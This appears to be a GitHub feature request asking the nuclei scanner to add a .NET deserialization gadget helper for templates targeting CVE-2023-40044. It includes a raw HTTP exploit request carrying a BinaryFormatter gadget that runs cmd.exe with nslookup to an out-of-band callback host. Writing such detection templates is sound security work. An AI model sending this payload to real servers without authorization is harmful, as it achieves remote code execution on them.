Support for .NET deserialization helpers

[ehsandeep]

Please describe your feature request:

Similar to generate_java_gadget, additional deserialization helpers need to be added to support writing templates for exploits, including deserialization payload for .NET formatters.

Reference: https://github.com/pwntester/ysoserial.net

Describe the use case of this feature:

Requires for CVE-2023-40044

Example:

{{generate_dotNet_gadget(gadget, format, cmd, encoding}}

http:
  - raw:
      - |
        POST /AHT/AhtApiService.asmx/AuthUser HTTP/2
        Host: {{Hostname}}
        Cookie: ASP.NET_SessionId=lilzf4yfwobb5fsaelo5abez
        Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266
        -----------------------------9051914041544843365972754266
        Content-Disposition: form-data; name="";
        ::AHT_DEFAULT_UPLOAD_PARAMETER::{{generate_dotNet_gadget("TypeConfuseDelegate", "BinaryFormatter", "cmd.exe /C nslookup {{interactsh-url}}", "base64"}}
        -----------------------------9051914041544843365972754266---

Example: projectdiscovery/nuclei-templates#8296

Reference
https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044

[l0nedigit]

+1 commenting to follow